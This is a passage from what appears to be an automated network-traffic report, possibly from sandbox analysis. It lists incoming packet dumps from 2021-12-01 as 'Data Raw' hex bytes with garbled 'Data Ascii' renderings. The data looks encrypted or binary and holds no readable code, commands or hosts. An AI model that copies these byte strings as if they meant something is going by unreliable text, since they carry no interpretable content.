f1 1d 62 d4 c8 c9 2f 32 02 06 05 0b 5b 3f 53 99 c7 e5 b3 15 76 1b 21 11 66 b0 54 73 e3 c3 08 69 43 5a a1 2b 68 bb c0 75 8f 4b 4e 83 3f 51 92 26 f1 5c d7 b0 7a 9c dc dd 75 36 3c 9e e2 4b da 7c aa b6 53 c4 bd 74 f0 0c 1b Data Ascii: w%aBtd?#DpdZ1}m)@m4o>As$>hU!/ho!^A\|1QnS4n%$EGA)*@bL(VCb2=XHt_=XHI]Wb/2[?Sv!fTsiCZ+huKN?Q&\zu6<K\|St
2021-12-01 18:25:38 UTC	59	IN	Data Raw: 14 2b 7d e5 32 72 23 c4 e8 16 b1 95 8f 17 59 61 6f 6e eb 2f 1d 8c a2 4a 42 ba 76 e3 51 ad 9b 06 96 13 91 37 44 b3 c3 2d 74 36 99 63 46 71 7f 8b de 55 54 05 d4 58 7c 33 8f a8 d1 f2 b0 8d 2c 31 7a f0 7b 7e 27 e2 18 8d 81 e9 b4 e4 97 61 57 a2 cc ae d6 19 59 fa 14 26 83 7d 8b 5b d7 53 e3 2b 08 8b 73 e5 be 7c 7d 76 ef 5b 1d c2 d0 2b 39 82 64 1f 55 97 56 21 ad b3 3f 82 41 3c 20 67 d4 9a 32 37 24 22 4d e8 b2 1a 6a 54 5f b8 30 d1 5b 24 f2 8e 9d ba 24 1f 60 e6 ed ea 56 4a bf 72 c0 f3 9f b4 28 8f 48 79 23 d2 4e 8a ce 73 cb 17 f8 d9 31 49 df 5f 72 cb 47 0a 7a 95 b6 85 79 92 01 0f cd 80 b3 4f 05 61 f4 cd 51 89 db b1 85 04 b3 a0 bf 08 94 c7 95 11 ca a8 76 22 a2 34 98 25 e4 d6 16 d6 91 b2 11 14 7b 50 7b 94 33 86 ec 55 8a af 44 32 bd 9a 2a 88 f8 c7 e7 eb 9e 54 a2 bd e2 Data Ascii: +}2r#Yaon/JBvQ7D-t6cFqUTX\|3,1z{~'aWY&}[S+s\|}v[+9dUV!?A< g27$"MjT_0[$$`VJr(Hy#Ns1I_rGzyOaQv"4%{P{3UD2*T
2021-12-01 18:25:38 UTC	60	IN	Data Raw: c4 0a 38 d7 a1 ef 7d 37 ec 16 e4 e2 76 8d 9b 35 c5 c1 50 52 61 0a 0c e8 40 71 00 24 dd 8f c3 43 53 a8 64 d2 d2 a2 93 79 c8 6f 7f 47 7a 43 31 a1 f2 6a 53 8c 6b d4 44 d8 89 9c 05 41 86 ae 7c d6 c7 b2 0d 7d 0f 44 81 2e e0 00 77 c2 f7 4d fe 63 3b a2 fb 1f 8e 5f 05 d7 39 28 eb bf d1 46 2c 6b dd 0f e0 e7 7e bc 26 d3 fa e7 4c 01 38 1b 4b bf 0e 1c 0f 18 3b 5d 6c c9 52 aa 5d 58 b6 62 57 f0 29 63 42 55 ab 22 73 7e 8a 56 f3 77 d2 82 72 52 13 89 7a cf 44 19 84 79 b9 09 76 cb 88 55 3f 52 bd 42 0b 03 1e 7b 5f f0 70 05 b1 c1 ee 60 a8 3f 47 48 11 33 1c ae e6 a4 ae ed c9 c9 61 3e 85 71 65 5b 57 57 49 fd b8 65 be 84 5e d3 a9 e6 5b e9 25 a3 a6 df af 09 02 03 a6 57 15 0d 3d a1 f0 ea e3 9d d8 aa 9a 42 92 23 77 5a ae 8f 9c c7 ff ca ae 2d 8b be ca 3b 82 c0 f7 7f 67 5a e1 33 f8 Data Ascii: 8}7v5PRa@q$CSdyoGzC1jSkDA\|}D.wMc;_9(F,k~&L8K;]lR]XbW)cBU"s~VwrRzDyvU?RB{_p`?GH3a>qe[WWIe^[%W=B#wZ-;gZ3
2021-12-01 18:25:38 UTC	61	IN	Data Raw: 63 fe 0e 77 2c 00 95 c0 e4 6e 6c 20 5e 3e f0 95 21 e8 db 32 63 bd 11 5d cc 7c 59 60 f5 2c 1d a1 99 21 c0 a4 17 bb 28 da c1 4f cb 6c 69 79 1f 93 b9 0f 48 75 f8 2b 60 fc f2 fe dc bd 84 cc c8 50 bc 46 9c 15 72 72 1d ca 9a 8a 2e a8 c2 e8 c8 a8 e9 bf fd 76 fe 4a fa ed 36 89 c2 84 a9 6b a8 7a 07 92 cf c1 8a b9 fa f8 21 62 fd c5 80 65 3c e8 95 11 5e 1f ad d7 d2 15 7c e5 f7 01 b0 33 d2 e8 26 ff ba 25 24 34 99 e1 35 d2 6f 60 64 ce ba fc 11 7f 3b 40 9f 72 3e a1 71 62 6c 56 57 c6 6e 7c 77 ed ac 52 de 94 80 a8 e6 6f b5 92 11 35 37 d9 18 03 80 ff 2c 63 25 ec 7b 65 27 63 9d e3 b1 56 10 4f 43 9f e1 9d d1 c2 e8 3c 80 42 6e df 50 a0 20 26 c8 0d ca a2 5f 68 01 62 d5 62 3a 63 42 45 ac c8 94 d3 69 c1 45 94 58 62 3a 70 40 8d 2b 65 65 40 e0 69 ec 31 2a 48 ba 08 8f 98 da 25 d2 Data Ascii: cw,nl ^>!2c]\|Y`,!(OliyHu+`PFrr.vJ6kz!be<^\|3&%$45o`d;@r>qblVWn\|wRo57,c%{e'cVOC<BnP &_hbb:cBEiEXb:p@+ee@i1*H%
2021-12-01 18:25:38 UTC	63	IN	Data Raw: 3b 93 82 3b f1 de 43 d2 11 ae cd cf 38 8a 23 be fb c0 d3 97 96 52 fa 1e ab b0 07 a5 3c 5c 36 6f c2 59 11 f6 27 38 f4 89 76 57 1e 96 db 43 25 82 d2 6a e7 0f 04 b2 19 f2 92 8a 8b 4c d5 28 ef b8 a7 3f cb 53 ea b9 82 1b 47 b4 19 0e fa 2a 73 08 f0 c3 e7 b3 3c 3e 7f 86 13 64 f5 81 9b 95 08 c7 c1 0f 2b 90 27 19 12 a7 f7 15 8c 6b a4 23 d7 c9 94 62 20 35 ad 31 5f 6a 9a 11 98 58 b1 d0 a6 50 f6 fb a2 00 1d 36 7a 24 5f 7f 61 38 fe dc d6 11 7f 2d a9 37 2f 18 0f d1 20 b5 82 a6 0e 62 41 82 47 95 48 51 f7 d5 d4 0d 9a 63 16 cf 49 8a 23 c8 2c 6f 05 58 ce 61 7c 03 b3 c0 4c e4 8f 64 44 26 89 d8 e0 ed 2e c2 9e 35 69 29 25 f0 82 07 d3 7b ae 95 13 09 df 9d 96 10 22 fe 3f f3 4b 79 b1 79 4d 53 65 88 4d 74 2d 44 11 c1 fd 91 e0 a8 f0 29 7b fe 4b 10 d8 e8 65 08 a7 6b 6a 0d b0 3a 66 Data Ascii: ;;C8#R<\6oY'8vWC%jL(?SG*s<>d+'k#b 51_jXP6z$_a8-7/ bAGHQcI#,oXa\|LdD&.5i)%{"?KyyMSeMt-D){Kekj:f
2021-12-01 18:25:38 UTC	64	IN	Data Raw: 74 12 0c 3f 48 02 e1 21 ef b3 e3 64 03 a2 3b d7 b6 6e 61 23 bb ff b8 ae 73 8c 59 d4 8f a7 12 fa 17 3f 1b 3c f6 58 bf 02 04 7f fb 7b 69 07 a8 e2 3a f8 77 e0 1e 42 64 64 c6 15 a6 69 6c 4d 9e 2e 34 80 f5 8d 49 58 1f 1d aa 6a ca 7b b5 0c d0 4e 15 3a 22 d5 a6 76 bc cf 71 cf ca 5b cf 29 52 4a 33 fa d1 b7 48 f1 78 26 c2 32 05 b1 ff b7 4f 21 19 40 4a 44 69 80 4a 2b 96 bb da 0d da 9d 09 4a f7 ab e3 27 2a 85 c8 c5 67 1a 1d 6b b5 1d cf 5e 7c 5d 7a d9 8e af f0 80 82 2c 4c 18 29 a2 e2 61 32 83 e0 4a 07 04 62 27 da c5 7b bc ff 6e 73 98 d6 63 ce 27 b1 55 54 8b 68 81 a5 ab 02 a1 6e 60 95 ef 69 bc 70 18 c1 d2 f2 0c 6c a0 9d a6 0c 74 27 c5 60 1b ec 30 81 63 97 a8 40 b7 19 8b 57 4e 61 73 3e 3c 49 87 28 e0 9d 5f 4f 0f 90 a2 5e b9 af 5d 4b 47 f7 fe 16 61 7e c2 94 34 21 18 37 Data Ascii: t?H!d;na#sY?<X{i:wBddilM.4IXj{N:"vq[)RJ3Hx&2O!@JDiJ+J'*gk^\|]z,L)a2Jb'{nsc'UThn`iplt'`0c@WNas><I(_O^]KGa~4!7
2021-12-01 18:25:38 UTC	65	IN	Data Raw: 28 b0 66 c1 5e 86 c4 21 ac a1 c7 e9 b6 5b 51 66 9a 40 08 c7 a6 ad a2 e9 44 4f 7b f0 f1 cf cb b0 fb c5 a9 6c 04 ed 80 03 ab e3 9c 5e 88 3b 5d 5d 8c f9 82 92 02 68 a0 3d 5f 41 ee 54 59 56 0a e8 63 af 55 94 ca c6 da d1 2b b6 68 cc 35 c8 cc f3 c1 4d 41 e6 58 60 cf cb dd 35 80 52 63 13 16 99 6d 0c 0c ab 21 8f d0 27 64 14 76 76 0a 14 b9 6b e1 5d 60 e2 46 a2 30 77 4f 59 eb 25 a5 ae 02 75 a4 4a 6e fe 88 34 b4 99 bd 1e 54 bd 42 71 40 9f 66 52 99 3a df 30 82 4e 70 6e 96 52 14 f4 a0 c9 e5 41 33 d7 94 35 14 c0 4e 5f 3b 37 f2 68 b3 38 d4 27 b5 da b3 e1 fc 69 5d 44 cc 1d 8e c0 2a 15 14 03 19 65 b4 04 dd 4f da f8 ef ad cb 97 b4 a8 ab a8 36 f0 cd b4 b2 4f 46 a0 d4 ae 41 e7 c8 3a a3 67 92 e0 de 07 4f 3c b9 3e 7c 17 ab 84 bf cf 36 e3 ad b0 5e 15 4e 52 ad 78 c8 58 fa 1a 05 Data Ascii: (f^![Qf@DO{l^;]]h=_ATYVcU+h5MAX`5Rcm!'dvvk]`F0wOY%uJn4TBq@fR:0NpnRA35N_;7h8'i]D*eO6OFA:gO<>\|6^NRxX
2021-12-01 18:25:38 UTC	66	IN	Data Raw: 18 81 21 76 99 52 7c 61 82 67 38 b7 92 f7 7f 58 9a e3 39 1a 02 20 9a 19 3d ba 31 1b aa 18 20 87 a4 b8 e1 4c e2 70 91 40 1a ff 0b d2 fc 24 b5 cb c0 bd 1f 3a e1 51 f9 e0 d6 92 16 4d 82 51 4c 6f ef 37 71 5c 10 82 5b 45 fe 94 1c e2 22 94 b9 d7 81 b7 b4 bf 7b 6b 56 7f 5c ab 8c ad cc 77 37 11 f1 e9 cb 33 d9 4c 35 6e 3f d7 f9 09 10 a1 51 19 49 b0 83 e7 48 a6 5f 72 b7 c4 f5 bf 4e ae 42 c9 a1 1b 0e 51 ef 2c e0 81 97 6d bc 70 21 57 72 f4 20 e3 44 ec e7 f7 95 df 5c 20 2f 9c 47 a9 e3 a4 7d cc 5a c7 8c 30 9b d5 b0 c9 96 79 89 da 0c df ba 88 89 26 a2 de 17 17 11 46 ca 25 f6 63 ac d5 94 f6 88 bd a0 7a c8 0c 33 e3 a8 bd 65 2a 82 88 db 9b de 5b 88 a6 a9 81 96 ab 8a ff c4 36 44 9e e7 39 af 62 36 9b 6e a0 bd 9b fd dd b9 d1 b4 8b 7e 2f 74 84 94 85 81 fe f8 88 6c 84 47 b5 18 Data Ascii: !vR\|ag8X9 =1 Lp@$:QMQLo7q\[E"{kV\w73L5n?QIH_rNBQ,mp!Wr D\ /G}Z0y&F%cz3e*[6D9b6n~/tlG
2021-12-01 18:25:38 UTC	67	IN	Data Raw: e2 3d 37 a1 7d cf f7 ee b9 ac 22 43 3f 9d ef 7f 7c 2c 8b 59 d0 13 8c 1a 20 fd 38 4f 89 f0 21 23 44 fa b4 c5 3b 1f 70 af 6d a8 cd 53 62 b5 f7 57 d3 92 38 f7 7a c3 46 f5 38 3a 49 1c 97 46 4d 45 a8 76 eb d0 e3 f6 cd 7a e0 f1 5a 56 69 ed f1 df af 10 27 3d 6a f0 e1 c1 ae a0 8a bb 18 74 4b a2 0e 0f a0 24 29 ab 17 b4 4e e8 38 7f bb d6 c4 21 6f b5 66 b6 87 c6 49 b9 cb ba 94 61 ae 82 e6 5e 09 42 5f a4 ca 46 f9 30 f4 0e d9 5d bb f2 6d 69 6d aa 75 a4 34 68 b9 b6 1c 50 01 16 6d 89 e1 12 7c 47 60 68 96 a5 d8 cd b8 5e f8 4d 11 96 5a cd c1 a1 a4 a7 9d ee b8 74 6a 05 39 9b bf 6b ac 41 31 3d 14 08 7c c5 ed 6a 2e c5 19 f6 00 91 75 58 66 76 0b 85 c7 e7 f6 c7 6a f0 a1 e9 d1 a1 ba a8 d0 dc 41 c5 e2 30 f2 f9 71 29 40 c6 5c a2 28 c8 e4 f4 74 90 78 18 35 17 1d 0d 72 b3 92 ce 5f Data Ascii: =7}"C?\|,Y 8O!#D;pmSbW8zF8:IFMEvzZVi'=jtK$)N8!ofIa^B_F0]mimu4hPm\|G`h^MZtj9kA1=\|j.uXfvjA0q)@\(tx5r_
2021-12-01 18:25:38 UTC	68	IN	Data Raw: 9f 5d 20 8c 2f 18 73 7a 3b cb 17 7a 71 98 da a3 c9 95 4c 7c 3f c9 f1 ef d5 f1 a1 83 9d e7 59 c3 b6 b3 c3 44 51 7a 17 92 b4 c7 fd fe 49 31 55 eb 5c 4c 7c 4f 2a e1 79 4c 55 0f 0f 5a ea 45 b6 e1 f5 95 00 49 38 54 d1 b4 df 2d 15 fe 0a 8a 76 5d a0 f9 bf da d9 42 4f 8a cf a9 e9 03 11 8c 9e 6c 92 18 2f 0d e1 94 7e 2f a0 60 0c 28 fe a7 34 53 86 3e 5c 65 e7 16 67 20 d5 5d 0b 1f 26 1e 6f ab 49 21 5a 1c 57 9c 9d 8a 98 fc 72 7f 32 af 16 1a ca d6 b8 61 a0 56 14 f1 7a bc 02 05 c3 13 12 a7 98 19 a3 de fe 3f b8 17 37 9d 49 52 0e 74 db 3f 4d fd af ec 96 c8 2f 1f aa 7d c9 5c 0e 44 94 c4 a4 41 18 af 63 7d 2f 5b 4b 99 51 2e f4 6d f0 eb 17 c8 e9 3c 8b 0a 32 c8 c4 7c 7f 1a ba 37 4c 8f e4 4c b5 2a 64 7b 2e 75 5d 81 c0 55 17 01 d1 a6 1c d4 09 ba c6 8e 25 c0 d0 73 f7 6d df 00 b8 Data Ascii: ] /sz;zqL\|?YDQzI1U\L\|OyLUZEI8T-v]BOl/~/`(4S>\eg ]&oI!ZWr2aVz?7IRt?M/}\DAc}/[KQ.m<2\|7LLd{.u]U%sm
2021-12-01 18:25:38 UTC	70	IN	Data Raw: db 60 66 1c 74 32 4c 18 78 9e a9 0d e2 a3 a0 4a 64 5f 99 a8 60 5e b4 ce 54 1c ed 92 68 23 a9 7f fc 2c 52 cb 22 c5 e4 07 64 25 62 1d cb 22 44 c5 f0 7d be 61 f1 ab 21 25 1a e5 34 e2 27 bf e9 cb 58 d4 2b a3 6c 0a 54 43 dc 62 22 0b ab 6e c1 66 78 f5 dc ee 0d a9 ac e0 e2 a4 cc d6 c3 aa 28 23 63 76 78 80 da 75 57 80 29 21 e2 1c 29 b7 31 8a c5 15 db 25 38 72 ce be 6e cd d5 2e 57 f2 1b 6d 93 44 8f 44 fc a3 2e d0 58 a4 11 2d e0 1f bf d3 1a fa 38 f2 0c 06 a0 4e 29 da fa 15 7a 90 93 6e 33 4a 2c ee d5 7c a7 e4 74 a8 af a0 a6 8e 55 88 91 3f 7f 4a 9b 8f f6 18 d9 5b 47 24 d1 e2 b2 9c 2e 3e ea 80 ed 0d 34 97 d1 f4 1b f7 1e 9b 74 ff 92 8f 20 c1 89 99 8d b6 e1 bc 0c 3c 16 02 e2 63 38 be 64 38 40 68 43 4a cc 4f e0 58 bd b5 1f 4a 5f ac 99 eb a1 9b 99 9f f8 46 e4 d1 33 12 b1 Data Ascii: `ft2LxJd_`^Th#,R"d%b"D}a!%4'X+lTCb"nfx(#cvxuW)!)1%8rn.WmDD.X-8N)zn3J,\|tU?J[G$.>4t <c8d8@hCJOXJ_F3
2021-12-01 18:25:38 UTC	71	IN	Data Raw: 50 e0 46 2c d1 f0 4a 98 ae 8a d0 8e 5f a0 15 be 9a da f3 6f 45 c6 c4 f8 8b 50 d2 40 a6 50 e8 f1 b8 b9 d3 2d 2d 5a 92 ea af cb 97 b5 d3 26 1f 57 df 0c bf 25 14 f3 b6 c2 15 e8 9b 41 20 9c e2 b1 af eb 0f 78 c0 72 f1 b1 61 d2 cd 01 37 fe 2b c2 55 12 de 9e c0 9a 95 98 db 9d 78 48 48 50 74 c7 47 e7 5a df d0 91 c9 ce 4b e7 8b bf 81 ef f4 52 41 df ee 3a 8c d9 5c 3e 20 cf ee 9f eb 39 81 47 3c 6d 5d 33 f4 f3 d5 7c 0f 50 0c 1b 44 90 db 2f 8b af 24 eb da 27 14 bc 01 b4 a5 c8 7b 09 c5 b6 72 23 c4 0d bb 6e 1e 41 b8 67 cc 0d dd 91 b0 e2 0b 77 70 ba 1f f2 9d 13 a9 d3 2d 5a 1a 4d fb f9 b7 fa f5 ed ce 71 5a 63 69 60 ea a8 dd dd 78 c5 c4 81 8e 7a 55 ab 8e 3b c1 08 49 32 44 45 81 55 24 a7 29 2a 44 17 3f 0a 17 5b 81 6d 24 e2 e9 28 ed eb 7e 1f 7e 8b 5b a8 7a 7b 50 50 9a fe 22 Data Ascii: PF,J_oEP@P--Z&W%A xra7+UxHHPtGZKRA:\> 9G<m]3\|PD/$'{r#nAgwp-ZMqZci`xzU;I2DEU$)*D?[m$(~~[z{PP"
2021-12-01 18:25:38 UTC	72	IN	Data Raw: 56 39 6b da c9 c3 72 1f 55 0e e9 92 76 fe 8a af 05 69 bf 96 ea 9e 74 d9 c5 04 83 b9 06 2f da 73 e1 eb 74 82 af 46 38 15 c0 eb e3 4f 91 10 dc fc 2c 60 dc 3d 3a e8 d0 1f 8a eb d7 21 0d 4c fa 85 31 5c e1 b7 14 00 ad 92 bd d5 99 41 84 14 b1 09 06 2f 1d 74 67 3a d6 f8 21 2a 5c 1e 6b 13 b3 22 b6 65 e9 28 59 ce d7 a5 38 4e 05 47 14 9e b8 39 94 30 00 da 3f 90 63 56 21 a9 59 49 fd ba 30 de 4b 27 c1 a1 87 b7 db ff 4b 1d 9e f4 a9 e6 f1 30 29 1a 46 4a 33 66 f6 bd 11 51 de 3c 93 d2 30 86 51 68 fe d8 43 d7 11 f6 39 c0 e7 72 0b 6f 92 6b df bd 7b 19 22 00 24 86 68 e5 e7 04 00 1b 70 f4 89 92 7b cd 30 70 50 45 bc 08 36 4a e7 23 fe 9d d4 3f b0 a7 31 fa 5e 99 7e 0d cf f1 42 4b 2b 3c 0d f4 31 13 97 7f cd b3 c3 5a 98 39 29 8b 7b 55 95 54 d7 3d 52 83 fa 05 46 c4 cc 2a b5 17 32 Data Ascii: V9krUvit/stF8O,`=:!L1\A/tg:!\k"e(Y8NG90?cV!YI0K'K0)FJ3fQ<0QhC9rok{"$hp{0pPE6J#?1^~BK+<1Z9){UT=RF2
2021-12-01 18:25:38 UTC	74	IN	Data Raw: 39 91 6d 24 88 c0 bd c9 24 f2 01 8d 55 e8 56 d6 f2 19 91 15 d3 d8 e2 51 f3 d4 ce 09 cc 89 92 12 a0 c6 15 20 0c bb 91 c7 ce 0d 6c dd 6a 33 82 33 03 12 39 95 7b dd 6e 66 42 a5 e7 8d 86 30 60 f4 78 25 07 6a 71 94 67 69 7d ad ce 86 9d b0 86 75 f6 5d f3 61 88 67 2c 10 85 dd d0 a9 af b9 79 2c 42 a0 e5 63 40 36 61 67 8e b8 88 3e 8f 09 e1 69 e9 cb 2d 11 6d dd 21 aa aa 51 7b 35 20 5e 85 2e fa 86 bf 09 84 21 92 df ef 48 eb a9 00 9f 9a a3 50 8d dd 5a a7 b6 3c 24 96 e4 a3 fa 28 4d b6 fd b3 0b 6d 85 6e 18 22 e8 3e 6a cc 3f a6 d4 01 14 78 0e 94 69 10 eb f8 8f 8c a0 a6 1d f1 f1 aa b8 c3 5f d0 2f 88 6f 55 0c f2 aa 82 cb 48 40 59 a9 c6 04 cc a5 00 4d d3 d7 f5 42 6a 70 f0 67 e2 54 da 2e 60 99 06 50 9f 14 fd 03 ac 10 cb 48 19 e9 70 fe d4 47 f8 1a e9 a8 30 24 f7 40 49 c0 14 Data Ascii: 9m$$UVQ lj339{nfB0`x%jqgi}u]ag,y,Bc@6ag>i-m!Q{5 ^.!HPZ<$(Mmn">j?xi_/oUH@YMBjpgT.`PHpG0$@I
2021-12-01 18:25:38 UTC	75	IN	Data Raw: af bc 7d 93 e7 d9 06 63 33 79 da 70 ab 16 6c 7a 3d 12 2e 5b 0a 2b fa eb ea 4c 90 72 57 54 59 37 c6 66 8d 9b 00 1b 8a 70 70 c1 d8 91 08 3a 7f 98 4e 74 e2 0b 7f a9 f0 db be d5 a8 25 0c 30 f3 6b 68 43 b6 8d 04 89 6c 6c 4c 65 0b f8 58 48 61 a8 d7 18 3f a7 39 86 2a 3c a3 ad 65 0c a5 41 98 57 ae 23 dd 9f f0 57 53 da 3c 8e 4b fe 85 ec 32 60 fd 5d 4e 22 19 c9 5f 3f d8 f2 61 b5 79 87 db 36 36 e2 17 82 8f 2f 34 bc 5f d7 51 04 77 3b c6 b9 f4 21 b2 1b e0 a4 2a 91 a9 a7 93 5e 03 87 3b ec 67 50 6b b8 3b 47 e2 fc 92 37 4e 4b f2 56 05 2f a8 41 0b db c0 cd ad 3c e1 bb c2 3b 3b ee ce 70 03 57 48 64 04 18 96 fe e8 40 f7 a3 a0 3f 0f 1f b2 09 f4 92 82 52 20 c2 17 da af f3 5f f4 18 ad 00 01 17 14 bc c8 f1 64 9f c0 1c 7b 78 99 4a 64 4c 3e 86 1b 6d 14 47 af 5e 40 2d c6 33 8f ac Data Ascii: }c3yplz=.[+LrWTY7fpp:Nt%0khCllLeXHa?9<eAW#WS<K2`]N"_?ay66/4_Qw;!^;gPk;G7NKV/A<;;pWHd@?R _d{xJdL>mG^@-3
2021-12-01 18:25:38 UTC	76	IN	Data Raw: d9 a1 6f 92 10 5e 44 64 41 86 5f 41 01 d1 45 4e bb 1c ac e5 05 fc d6 68 e3 9a 44 c4 58 e6 14 ac 21 71 fc 54 04 08 18 46 db 85 69 d1 3a c4 d4 30 51 d3 df 81 41 ad 75 a0 b4 3b eb a5 cc d1 b2 a1 db fa da 66 1f 5c bc 42 a6 be 96 75 a4 71 b6 ae 2c cb d9 cd 69 c5 36 ce e2 7b ac e2 1a 1f e3 7f 59 bd 26 51 1c 8b 21 a4 9b a4 22 b3 c9 cf 13 f9 66 62 65 db a8 8b d3 5a 3c a9 fd 5f 28 98 d4 34 a9 30 2e b8 34 23 a8 32 bf 2a 39 47 ac 87 9a d0 13 8c 18 f5 f3 f7 a2 3a a7 aa 08 3d c7 da 27 a4 02 aa 6f 28 2b f2 dc 70 ac f7 2b 33 ae 4d 5f b2 7a d9 09 6d a3 54 42 ae b9 68 bd 84 0a 47 d0 84 5f 47 47 0b 82 34 26 d7 f8 a0 6f 9b 0e 27 03 09 40 17 d6 e5 ab 8a 31 83 e1 ea 5c 33 7e a8 8e b7 7b e4 19 42 e0 bd 02 ee c7 7e a8 ad fe f5 b8 34 28 b9 56 34 b4 f8 95 cd a5 6d f7 7d 38 46 b7 Data Ascii: o^DdA_AENhDX!qTFi:0QAu;f\Buq,i6{Y&Q!"fbeZ<_(40.4#2*9G:='o(+p+3M_zmTBhG_GG4&o'@1\3~{B~4(V4m}8F
2021-12-01 18:25:38 UTC	77	IN	Data Raw: ed f4 02 29 5b 5e a2 59 bb 11 22 d6 98 b2 fd 74 af 52 57 71 f2 fb 6a dc 1b 40 47 60 78 2a 54 4d c9 d2 72 5b 36 da 51 91 88 28 36 fa 7b 15 39 9b bd c8 7d 5f a3 42 c5 5c 7a 78 aa 88 40 a5 78 e6 43 23 aa 9a 76 da 0d af 5a f5 15 04 dc d4 ae 9d c5 58 0f 94 2f b6 20 c3 6e 3d 95 6c fd 95 9a c0 cb e8 bf 4c 47 9b 49 91 12 11 6c 48 ec 26 3d a8 b6 e2 83 1f bd 14 e6 1e c0 e2 db 59 42 7f 5a 3f d3 ce 27 dc 65 bb a1 e1 7b 5a 1e d6 c9 e4 eb b4 a4 f9 07 e7 37 b6 0f fc 38 39 09 4e b3 cb 40 d3 c6 4c 3a a3 9b 79 4e a2 b3 50 6c e6 bb a7 8f 65 0d b2 90 57 f8 9a a5 7d 0f be 63 b2 cb 3e 18 d0 a4 59 c0 ef 4e fe 0c 76 b1 d7 99 44 74 15 d5 0d 8e 1c 75 da b2 6c cb 64 2f ff 5a 63 de a3 4c ca a2 a8 a3 97 be 48 94 f0 0c 3c a2 c2 7c f0 9a 4b c5 f0 ea 87 f0 4e 17 ff 0a ca 70 e4 d8 d8 2f Data Ascii: )[^Y"tRWqj@G`x*TMr[6Q(6{9}_B\zx@xC#vZX/ n=lLGIlH&=YBZ?'e{Z789N@L:yNPleW}c>YNvDtuld/ZcLH<\|KNp/
2021-12-01 18:25:38 UTC	79	IN	Data Raw: 5e 64 18 ae 01 43 1d b0 c2 5f 7e 2d 99 cb d6 29 a9 fc 6c 12 97 9d 48 bd 88 c8 54 ee d3 c9 db 56 a6 71 2b 82 99 26 25 85 07 5b 8a 2a 71 e2 9b 67 9c 94 bb b9 fa 15 5b 6e 06 1f 3d 6f 9f b4 cb 98 8d 68 cb a0 de a3 59 fe 8f 33 d0 bc a4 9a cf 5f da 5e 52 1a e0 92 56 90 c7 f9 fb 33 40 05 88 58 fb eb 95 46 15 ad d7 09 eb f8 db d0 93 0e f4 1a 9d ee 79 07 da ff 11 c6 27 f8 c5 cf a8 29 29 02 22 2c 1b 13 54 6b 33 dd f7 19 0e e6 d5 58 bd b3 f6 42 7d f6 d4 aa 13 bb 12 11 90 8a 2c 2e d4 96 98 95 16 9b 78 f6 9e e1 b3 c5 9a 23 a3 c5 e4 0e ab 40 b0 cc f2 80 6c aa 01 62 cc 0d 4a 53 04 50 a0 b7 af 9d e1 47 a7 c1 e2 d3 f2 9c 3f 84 ee 59 56 d3 88 6d d7 9d 7f 29 83 08 12 22 f5 0d c7 57 21 9b 55 58 92 20 61 85 48 50 cf 4b 21 27 8d 7a 48 bc a8 39 96 15 6e 9e 71 b0 d0 ba e9 0e 91 Data Ascii: ^dC_~-)lHTVq+&%[*qg[n=ohY3_^RV3@XFy'))",Tk3XB},.x#@lbJSPG?YVm)"W!UX aHPK!'zH9nq
2021-12-01 18:25:38 UTC	80	IN	Data Raw: e8 41 73 a6 3d 7f 0c 74 4a db 4b b6 26 49 5b c6 93 35 49 42 f6 23 06 fb 0e 2f 26 08 69 a4 17 d8 8e 2e 68 38 db 8f 95 55 80 c2 9e ab 67 f1 52 5a 31 f3 4d 33 10 09 dc cf 69 55 3f b6 af 64 9d 58 80 33 c1 93 4a 19 1f 6d d0 1f 51 7a cc 07 6f 34 9c 01 a6 5b 51 36 4e cd 69 3e e6 14 d6 b1 08 77 b1 a5 9e 65 42 e7 6a 10 14 e6 d3 62 53 43 d6 77 d8 fa 96 09 16 e5 9a 87 26 57 cc ed 4c 1f 9a d3 c9 bd 04 e3 07 6e 9b b8 8e df 7d 91 ec 25 36 be 6b 95 2e 1d 73 0d 5f aa 82 bf 3f b9 d8 59 0e 83 f4 2c 59 d2 de 01 f8 a9 88 9d bc 41 59 c7 ef d2 ef 81 b0 ac 17 6b c8 6d 64 dc 83 9d e7 06 6b b4 a0 a2 9d 7b 1b 3d 4a 73 cb 20 46 2c 84 9c ac 1e 57 75 4c e4 fd ee d0 36 50 f9 8a 88 bc 94 eb 7a 29 98 27 b4 ef da e2 59 9d ec ef 93 71 65 29 3f 10 2e f4 e8 e4 7f fc f8 45 34 ea 2c 36 bc 7d Data Ascii: As=tJK&I[5IB#/&i.h8UgRZ1M3iU?dX3JmQzo4[Q6Ni>weBjbSCw&WLn}%6k.s_?Y,YAYkmdk{=Js F,WuL6Pz)'Yqe)?.E4,6}
2021-12-01 18:25:38 UTC	81	IN	Data Raw: 2b ef 37 bd ba 30 ba 33 83 30 b7 6c 48 75 07 1d 20 9a ad fc d3 4f 5e cd c4 3c 7f 4b b1 69 07 ae e2 1a 9b 5c 25 3e 98 16 d6 99 32 8a c9 16 4e e9 94 33 63 a8 73 a2 47 11 ae 4d e1 c6 75 ed 87 a6 55 c9 6e 42 c1 b9 8b 84 c5 f0 3b 54 d8 b2 0e 86 fb 1e 98 c3 7b 65 23 63 89 5b 7c 19 f4 a7 e0 e6 df 6d 3d 36 4c 7d 80 42 a6 13 47 fa 23 51 72 b1 ca ba 4f 0b 68 63 d6 62 4e a3 ff 41 4e c5 e2 69 10 6c 22 c6 d5 2f 9b 1d 50 7e 51 8e 0c 4c 46 a3 61 ec 98 47 ad f8 c6 9e d8 8a a0 6f 46 17 ac 07 eb 91 15 7c 28 d0 46 8d f1 57 7f d4 d6 68 c1 25 e9 d0 79 69 ac 4c ff b7 82 a2 85 11 18 d9 e7 94 72 ec 92 36 19 e4 0c 40 95 26 d1 84 95 90 f6 85 4c dd 3e 21 2a ec 1c 6b 13 6f 8c 70 6e b9 53 e7 b8 56 1f c9 b2 f9 4b f4 fd 10 9a 34 94 a1 ac bf d1 36 50 80 1f e6 e5 f8 cf 3e 76 69 ad 4f 73 Data Ascii: +7030lHu O^<Ki\%>2N3csGMuUnB;T{e#c[\|m=6L}BG#QrOhcbNANil"/P~QLFaGoF\|(FWh%yiLr6@&L>!*kopnSVK46P>viOs
